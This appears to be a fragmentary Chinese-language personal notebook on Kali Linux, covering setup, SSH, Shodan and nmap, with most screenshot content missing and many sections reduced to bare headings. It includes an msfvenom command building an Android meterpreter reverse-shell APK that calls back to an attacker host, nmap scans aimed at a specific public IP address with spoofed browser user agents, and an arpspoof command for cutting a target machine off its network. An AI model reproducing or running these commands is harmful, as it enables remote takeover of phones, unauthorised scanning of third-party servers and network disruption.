Kali之炉火纯青

Kali安装

Kalihttps://www.kali.org/get-kali/

kali连接到与物理机同一网段

1.

2. 

 完成，目前有效！

给Kali设置root密码

1.sudo passwd root
#输入原密码 例如：root
2.输入两次新密码即可

 kali开启22端口

vim  /etc/ssh/sshd_config

 

启动ssh服务 

开机启动 

 连接

搜索引擎

shoudanhttps://www.shodan.io

 

nmap

 -p 端口范围 -A深度扫描

 目录扫描

 扫后缀

 从kali中下载到主机

rz #是上传命令

kali控制手机测试

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.3.101 LPORT=8888 R > test.apk

 第二步

第三步

第四步

 第五步

 制作.exe木马测试

 加强版

 

 编码器

 

 

 安卓木马2

 

 

域名信息查询 

 

 

 

 武器库 

 

 

 

 

 

 

 必选 

 运行

 

msfvenom生成linux木马

 

上帝之眼nmap

nmap -A -v -p80 159.75.90.69 --script http-methods --script-args http.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

sudo nmap -v -sS -p8000-9000 -Pn -T4 -A 124.*.8.* --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"

 

 

 

arp断网中遇到的问题 

解决策略

vi /etc/apt/sources.list

需要将原来的注释掉，然后添加新源，以下为国内源列表：

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
源替换完后需要更新下：
apt update

sudo arpspoof -i eth0 -t 192.168.3.106 192.168.3.1 #后面的ip是网关，前面的是被攻击ip